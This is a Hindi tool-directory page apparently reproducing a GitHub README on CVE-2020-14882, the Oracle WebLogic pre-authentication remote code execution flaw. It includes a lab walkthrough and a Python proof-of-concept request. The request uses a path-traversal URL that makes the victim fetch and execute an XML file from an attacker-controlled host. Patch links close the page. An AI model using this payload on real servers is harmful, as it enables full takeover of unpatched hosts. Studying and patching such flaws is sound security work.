Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-14882 — Oracle WebLogic Server का अधिग्रहण | Kitploit
उपकरण/GitHubGitHub/lucaspdiniz/cve-2020-14882
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHublucaspdiniz/cve-2020-14882

CVE-2020-14882

Oracle WebLogic Server का अधिग्रहण

रिपॉजिटरी देखें
12 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

WebLogic RCE भेद्यता - CVE-2020-14882

  • परिचय

CVE-2020-14882 Oracle WebLogic Server के Console घटक में एक दूरस्थ कोड निष्पादन (RCE) दोष है। यह प्रमाणीकरण-पूर्व दोष Oracle द्वारा हमले की जटिलता को "निम्न" और "आसानी से शोषणीय" के रूप में चिह्नित किया गया था, जिसके परिणामस्वरूप इसे 9.8 का महत्वपूर्ण CVSSv3 स्कोर दिया गया। सफल शोषण एक अप्रमाणित हमलावर को HTTP पर Oracle WebLogic सर्वर से समझौता करने और होस्ट का पूर्ण नियंत्रण लेने की अनुमति देगा। (और अधिक - Tenable)

  • स्कोर गंभीरता - CVSS 3 ⚠️


प्रभावित समर्थित संस्करण हैं 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 और 14.1.1.0.0.

खोज - POC ❗

वातावरण 💻

पीड़ित (WebLogic सर्वर): 192.168.0.15 - Windows 10 PRO जिसमें WebLogic सर्वर चल रहा है।
हमलावर (होस्टेड फ़ाइल XML): 192.168.0.16 - Kali Linux - GNU/Linux - Debian.

  1. पहले चरण के लिए, आइए एक python फ़ाइल बनाएं जो weblogic में भेद्यता का शोषण करेगी।

पेलोड:

root@kitploit:~
import requests
url = http://{}:{}/console/images/%252E%252E%252Fconsole.portal' \
		'?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' \
		'(%22http://192.168.0.16:8000/Documents/teste.xml%22)'.format('192.168.0.15', '7001')
response = requests.get(url)

यह पेलोड spring framework XML लाइब्रेरी को कॉल करेगा ताकि हमलावर के डोमेन में एक सर्वर को अनुरोध भेज सके जो teste.xml फ़ाइल की खोज करे।

  1. हमें XML फ़ाइल तैयार करने की आवश्यकता है जिसे पीड़ित द्वारा कॉल किया जाएगा। हमने एक मानक XML संरचना बनाई, हालांकि, हमने फ्रेमवर्क शामिल किया और मान फ़ील्ड इस चरण में महत्वपूर्ण हैं क्योंकि वे पीड़ित पर निष्पादित होंगे। इस उदाहरण के लिए, हम Windows कैलकुलेटर फ़ाइल को कॉल कर रहे हैं।

  1. हमलावर के होस्ट पर, हमें XML फ़ाइल के साथ एक सर्वर बनाने की आवश्यकता है जिसे पीड़ित द्वारा अनुरोध किया जाए। आसानी के लिए, हम अपने python सर्वर http.server का उपयोग करते हैं।

  1. हमला शुरू करना 🎯. हम चरण 1 से स्क्रिप्ट शुरू करते हैं, इस चरण में हम पीड़ित द्वारा किए जा रहे XML फ़ाइल कॉल के लॉग की पहचान करने में सक्षम थे

  1. RCE सफलतापूर्वक निष्पादित हुआ 💥. पीड़ित की ओर से, windows कैलकुलेटर का दूरस्थ निष्पादन (RCE) देखना संभव है

निष्कर्ष

28 अक्टूबर को, जंग नामक एक सुरक्षा शोधकर्ता ने CVE-2020-14882 के बारे में एक ब्लॉग पोस्ट (वियतनामी में) प्रकाशित किया, जिसमें आंशिक विवरण शामिल थे जो PoC के लिए उपयोग किए जा सकते थे। जंग WebLogic दोषों से अपरिचित नहीं हैं, उन्हें CVE-2020-2555 की खोज और Oracle को रिपोर्ट करने का श्रेय दिया गया, जिसने जनवरी 2020 CPU में भेद्यता को पैच किया। मार्च में, जंग ने पुष्टि की कि CVE-2020-2555 पूरी तरह से ठीक नहीं हुआ था। CVE-2020-2555 के लिए बाईपास एक अन्य शोधकर्ता, VNPT सूचना सुरक्षा केंद्र (ISC) के Quynh Le द्वारा प्रकट किया गया था। Le और जंग दोनों को इस बाईपास की रिपोर्ट करने का श्रेय दिया गया, जिसे CVE-2020-2883 के रूप में पहचाना गया। (और अधिक - Tenable)

ठीक करने में मदद के लिए कुछ लिंक

  • Oracle WebLogic: CVE-2020-14882 : क्रिटिकल पैच अपडेट (दस्तावेज़ आईडी 2771503.1)। (Oracle समर्थन)

  • Oracle क्रिटिकल पैच अपडेट सलाह - अक्टूबर 2020। (Oracle समर्थन)

  • CVE-2020-14882 Weblogic के प्रभाव को कम कैसे करें। (Oracle समर्थन)

  • Oracle Fusion Middleware के Oracle WebLogic सर्वर उत्पाद में भेद्यता। (Mitre - CVE)

भेद्यता ठीक हुई ✅

टूल डाउनलोड करें